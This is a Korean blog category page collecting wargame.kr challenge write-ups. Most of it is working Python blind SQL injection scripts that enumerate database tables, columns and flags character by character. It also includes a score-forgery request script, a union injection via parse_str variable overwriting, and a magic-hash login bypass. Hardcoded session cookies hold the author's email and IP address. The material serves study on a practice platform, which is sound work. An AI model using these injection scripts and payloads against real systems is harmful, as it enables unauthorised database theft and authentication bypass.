'Wargame/wargame.kr' 카테고리의 글 목록

Wargame/wargame.kr

wargame.kr dun_worry 2017.04.28
wargame.kr login_with_crypto_but 2017.03.19
wargame.kr qna 2017.03.02
wargame.kr adm1nkyj 2017.02.26
wargame.kr fly me to the moon 2017.02.24
wargame.kr ip_log_table 풀이 2017.02.23
wargame.kr simple board 2017.02.19
wargame.kr dmbs335 700p 2016.10.04
wargame.kr web_chatting 650p 2016.10.04
wargame.kr jff3_magic 800p 2016.09.03

wargame.kr dun_worry

2017. 4. 28. 16:35

wargame.kr login_with_crypto_but

2017. 3. 19. 15:50

wargame.kr qna

2017. 3. 2. 17:35

wargame.kr adm1nkyj

2017. 2. 26. 11:50

wargame.kr fly me to the moon

2017. 2. 24. 20:40

# -*- coding: utf-8 -*-
import urllib, urllib2, sys

url = "http://wargame.kr:8080/fly_me_to_the_moon/"
score_url = "http://wargame.kr:8080/fly_me_to_the_moon/high-scores.php"
token_url = "http://wargame.kr:8080/fly_me_to_the_moon/token.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "jfovvtct42sj2atn25n902fmi7"

req = urllib2.Request(token_url)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+";"
               +"ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
res = urllib2.urlopen(req).read()
dat = {'score': "31337", 'token': res}
dat = urllib.urlencode(dat)
req = urllib2.Request(score_url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+";"
               +"ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")

res = urllib2.urlopen(req).read()
print res

'Wargame > wargame.kr' 카테고리의 다른 글

wargame.kr qna (0)	2017.03.02
wargame.kr adm1nkyj (0)	2017.02.26
wargame.kr ip_log_table 풀이 (0)	2017.02.23
wargame.kr simple board (0)	2017.02.19
wargame.kr dmbs335 700p (0)	2016.10.04

wargame.kr ip_log_table 풀이

2017. 2. 23. 20:42

post로 넘어가는 값에서 인젝션이 먹힌다.

일단 소스

# -*- coding: utf-8 -*-
#테이블 수
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

for i in range(50):
    dat = {'idx': "17038 and if((select count(table_name) from information_schema.tables)="+str(i)+",17038,0)"}
    dat = urllib.urlencode(dat)
    req = urllib2.Request(url,dat)
    req.add_header("User-agent", user_agent)
    req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
    res = urllib2.urlopen(req).read()

    if "2017-02-23 19:47:27" in res:
        print "[*]Find tables count! : " + str(i)
        break
        sys.exit(1)

# -*- coding: utf-8 -*-
#테이블명
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

n = 40
while n < 43:
    flag = ""
    for i in range(40):
        for j in range(36,90):
            dat = {'idx': "17038 and if(substring((select table_name from information_schema.tables limit "+str(n)+",1),"+str(i)+",1)="+"0x"+hex(j)[2:]+",17038,0)"}
            dat = urllib.urlencode(dat)
            req = urllib2.Request(url,dat)
            req.add_header("User-agent", user_agent)
            req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                        + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
            res = urllib2.urlopen(req).read()

            if "2017-02-23 19:47:27" in res:
                flag += chr(j)
                print "[+]Find! : " + chr(j)
                break
                sys.exit(1)
    print "[*]Find flag! : " + flag
    n += 1

#칼럼명
import urllib, urllib2

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

dat = {'idx': "17053  and if((select count(column_name) from information_schema.columns)=486,17053,0)"}
dat = urllib.urlencode(dat)
req = urllib2.Request(url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229c4639bdd4c2b4e5fdd6c246f1e79011%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487934026%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3B%7Dba943cf039368323def355883b41fbefa82da0c6")
res = urllib2.urlopen(req).read()
print res

'Wargame > wargame.kr' 카테고리의 다른 글

wargame.kr adm1nkyj (0)	2017.02.26
wargame.kr fly me to the moon (0)	2017.02.24
wargame.kr simple board (0)	2017.02.19
wargame.kr dmbs335 700p (0)	2016.10.04
wargame.kr web_chatting 650p (0)	2016.10.04

wargame.kr simple board

2017. 2. 19. 18:52

#테이블 injection
# -*-coding:utf8 -*-

import urllib2

print "[*] start!"
n = 0
while n < 43:
    dat = ""
    for i in range(45):
        for j in range(48,97):
            param = "1%20and%20substring((select%20table_name%20from%20information_schema.tables%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            res = urllib2.urlopen(req).read()
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    print "[*]Find table " + dat
    n += 1
print "[*] Finish!"

#플래그 구하기
# 조금 수정 필요, 답 나옴
# -*-coding:utf8 -*-
import urllib2
print "[*] start!"
n = 0
while n < 43:
    dat = ""
    for i in range(45):
        for j in range(48,97):
            param = "1%20and%20substring((select%20FLAG%20from%20README%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            res = urllib2.urlopen(req).read()
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    print "[*]Find KEY " + dat
    n += 1
print "[*] Finish!"

'Wargame > wargame.kr' 카테고리의 다른 글

wargame.kr fly me to the moon (0)	2017.02.24
wargame.kr ip_log_table 풀이 (0)	2017.02.23
wargame.kr dmbs335 700p (0)	2016.10.04
wargame.kr web_chatting 650p (0)	2016.10.04
wargame.kr jff3_magic 800p (0)	2016.09.03

wargame.kr dmbs335 700p

2016. 10. 4. 13:05

문제 화면입니다. SQL injection 문제네요.

문제에 들어가보면 이렇게 테이블이 주어집니다. 간단히 기능 학습을 해보고 view-source를 눌러보겠습니다.

눈에 띄는 코드는 $_SERVER['QUERY_STRING'] 함수와 parse_str 함수입니다.

$_SERVER['QUERY_STRING']은 넘어온 값을 저장하는 것입니다.

ex) id=123&pw=123

그리고 parse_str은 인자를 php변수로 저장하는 함수입니다.

따라서 get 방식으로 보낸 값들이 php변수로 저장되는것입니다.

그리고 아래의

$col = preg_match('/^(subject|content|writer)$/isDU',$col) ? $col : '';

if($col) {

$query_parts = $col . " like '%" . $keyword . "%'";
}

에서 $col변수에 preg_match 함수가 false가 나오도록 한 다음 get으로 $query_parts에 원하는 쿼리를 입력해서 넘기면 문제를 풀 수 있습니다.

query_parts = 1 union select 1,2,3,4 -- 를 입력하면 1234가 나옵니다. 이제 table_name을 뽑아보도록 하겠습니다.

information_schema에서 table 목록들을 뽑았습니다. 플래그가 있을법한 테이블이 하나 있네요.

테이블 이름은 Th1s_1s_Flag_tbl 입니다. 이제 칼럼 목록을 뽑아보겠습니다.

column_type과 column_name을 같이 뽑았습니다.

f1ag 칼럼이 있네요 이제 테이블과 칼럼을 알았으니 칼럼에 있는 값을 뽑겠습니다.

flag가 나왔습니다.

'Wargame > wargame.kr' 카테고리의 다른 글

wargame.kr ip_log_table 풀이 (0)	2017.02.23
wargame.kr simple board (0)	2017.02.19
wargame.kr web_chatting 650p (0)	2016.10.04
wargame.kr jff3_magic 800p (0)	2016.09.03
wargame.kr 4번 login filtering 450p (0)	2016.07.25

wargame.kr web_chatting 650p

2016. 10. 4. 01:24

문제 화면입니다.

sql injection 문제네요. 개발자 관점에서 생각해보라는 힌트가 주어졌습니다.

아이디를 입력하는 창이 나옵니다. 아무거나 입력보겠습니다.

간단한 채팅 화면이 나옵니다. 입력하면 조금의 딜레이가 있은 후 채팅이 실시간으로 보여집니다.

소스코드에서 chatlog.php?t=1을 해보면 어떤 수가 나옵니다. 채팅을 또 친 후 들어가보면 수가 늘어나 있습니다. 아마 현재까지 누적된 채팅 수와 관련이 있는것 같습니다.

소스코드에 나온대로 chatview.php?t=1&ni= 에서 20808을 입력하니 아무것도 안뜹니다. 하지만 20807을 넣으면 방금 입력한 채팅이 나옵니다.

그리고 20806을 입력하면 그 전 채팅까지 총 두개가 나옵니다.

따라서 ni에 값을 입력하면 (제일 마지막에 입력한 채팅 number - 입력한 값) 까지 해서 그 수만큼 보여주는거로 추정됩니다.

그리고 ni에 인젝션을 시도해봤는데 먹히는걸로 봐선 이 부분을 통해 문제를 풀어야할것 같습니다.

union을 통해 select 해오겠습니다.

union 에선 select 하려면 이전 함께 가져오는 수를 맞춰줘야 하므로 개수를 추측하면서 select 해보니 다섯개를 select 하면 뽑을 수 있습니다.

제일 아래에 chat_log_secret이 제일 의심가는 테이블입니다. 연습을 위해 파이썬으로 테이블 개수를 가져오고 거기서 테이블명, 더 나아가 칼럼을 구해보도록 하겠습니다.

#테이블 개수
import urllib2, re, sys 

print "[+] Start!"
for i in range(50):
        dat = "t=1&ni=20798%20and%20if((select%20count(table_name)%20from%20information_schema.tables)="+str(i)+",20798,5555555)"
        url = "http://wargame.kr:8080/web_chatting/chatview.php?" + dat 
        req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
        res = urllib2.urlopen(req).read()
        if "font-size:12px;" in res:
                print "[+] SUCCESS!"
                print "[*] counting : " + str(i)
                break
                sys.exit(1)

테이블의 개수는 0부터 41인덱스 까지 42개입니다.

#테이블 이름 추출
import urllib2, re

n = 0 
print "[+] Start!"
while(n<42):
        table = ""
        for i in range(40):
                for j in range(48,97):
                        dat = "t=1&ni=20798%20and%20if(substring((select%20table_name%20from%20information_schema.tables%20limit%20+"+str(n)+",1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,5555555)"
                        url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
                        req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
                        res = urllib2.urlopen(req).read()
                        if "font-size:12px;" in res:
                                table += chr(j)
                                break
        print "find table : " + table
        n += 1
print "[+] Finish!"

제일 아래의 chat_log_secret 테이블이 나옵니다.

이제 칼럼의 수를 구해보겠습니다.

#칼럼 개수
import urllib2, re, sys 

print "[+] Start!"
for i in range(500):
        dat = "t=1&ni=20798%20and%20if((select%20count(column_name)%20from%20information_schema.columns)="+str(i)+",20798,5555555)"
        url = "http://wargame.kr:8080/web_chatting/chatview.php?" + dat 
        req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
        res = urllib2.urlopen(req).read()
        if "font-size:12px;" in res:
                print "[+] SUCCESS!"
                print "[*] counting : " + str(i)
                break
                sys.exit(1)

486개의 칼럼이 존재합니다. 이제 칼럼 이름을 알아내보도록 하겠습니다.

#칼럼 이름
import urllib, urllib2, re, sys, time, os

n = 0 
print "[+] Start!"
while(n<487):
        column = ""
        for i in range(40):
                for j in range(48,97):
                        dat = "t=1&ni=20798%20and%20if(substring((select%20column_name%20from%20information_schema.columns%20limit%20+"+str(n)+",1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,5555555)"
                        url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
                        req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
                        res = urllib2.urlopen(req).read()
                        if "font-size:12px;" in res:
                                column += chr(j)
                                break
        print "find column : " + key 
        n += 1
print "[+] Finish!"

의심가는 칼럼은 readme입니다.

테이블과 칼럼을 구했으니 플래그를 구해보겠습니다.

import urllib2, re

print "[+] Start!"
flag = ""
for i in range(40):
        for j in range(48,97):
                dat = "t=1&ni=20798%20and%20if(substring((select%20readme%20from%20chat_log_secret%20limit%200,1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,55555)"
                url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
                req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
                res = urllib2.urlopen(req).read()
                if "font-size:12px;" in res:
                        flag += chr(j)
                        break
print "[*] FLAG : " + flag 
print "[+] Finish!"

플래그를 구했습니다.

'Wargame > wargame.kr' 카테고리의 다른 글

wargame.kr simple board (0)	2017.02.19
wargame.kr dmbs335 700p (0)	2016.10.04
wargame.kr jff3_magic 800p (0)	2016.09.03
wargame.kr 4번 login filtering 450p (0)	2016.07.25
wargame.kr 3번 flee button 450p (0)	2016.07.25

wargame.kr jff3_magic 800p

2016. 9. 3. 18:39

jff3_magic 문제를 풀어보겠습니다.

문제를 시작하면 한개의 웹 페이지가 나옵니다. 페이지에 대한 기능을 학습한 후 문제에 접근하도록 하겠습니다.

먼저 메인화면에는 로그인 폼이 있습니다. 그리고 왼쪽 사이드에는 MemberList라는 index.php로 이동할 수 있는 <a> 태그와 no라는 파라미터로 갈 수 있도록 되어있습니다.

cd80은 1 Orang은 2 Comma는 3 으로 말이죠.

한번 Submit버튼으로 로그인을 시도해보도록 하겠습니다.

아무것도 입력하지 않고 버튼을 클릭하면 위와 같이 나옵니다.

184b8482a0c050dca54b59c7f05bf5dd 를 구글에 검색하면

Hash Haval128,5 라는 인코드라고 유추할 수 있습니다. 이 문제의 이름이 magic인것으로 보아 magic hash 취약점이란 것을 알 수 있습니다.

magic hash 취약점에 대해선 구글에서 검색하시면 자세히 볼 수 있습니다.

그리고 아까 no 파라미터에 쿼리를 조작하겠습니다.

?no=1||1 로 입력할 시

취약점이 존재하는것을 알 수 있습니다.

python 스크립트를 이용해 injection을 해보겠습니다.

import urllib, urllib2, re

string = "abcdefghijklmnopqrstuvwxyz0123456789"
key = ""

for i in range(32):
        for j in range(len(string)):
                url = "http://wargame.kr:8080/jff3_magic/?no="
                payload = "5||(lpad(pw," + str(i+1) + ",space(1))='" + key + string[j] + "')"
                url += payload
                req = urllib2.Request(url, headers={"Cookie": "",})
                res = urllib2.urlopen(req).read()
                ok = re.findall("admin", res)
                if ok: 
                        key += string[j]
                        break

print "[*] Key : " + key

아래와 같은 결과를 얻을 수 있습니다.

0e로 시작하는 Haval128,5 인코딩 값을 찾아서 입력해주면 풀릴 것 같습니다.

http://sso.pe.kr/15를 참고하시면 됩니다.

ID는 admin

PW 는 아래와 같이 haval128,5 인코딩 하면 0e로 시작되는 값인 115528287을 입력합니다.

문제가 풀렸습니다.

python script 참고 : http://choiys.tistory.com/entry/Wargamekr-Web800jff3magic

'Wargame > wargame.kr' 카테고리의 다른 글

wargame.kr dmbs335 700p (0)	2016.10.04
wargame.kr web_chatting 650p (0)	2016.10.04
wargame.kr 4번 login filtering 450p (0)	2016.07.25
wargame.kr 3번 flee button 450p (0)	2016.07.25
wargame.kr 2번 QR CODE PUZZLE 300p (0)	2016.07.25

PREV 1 2 NEXT

SSo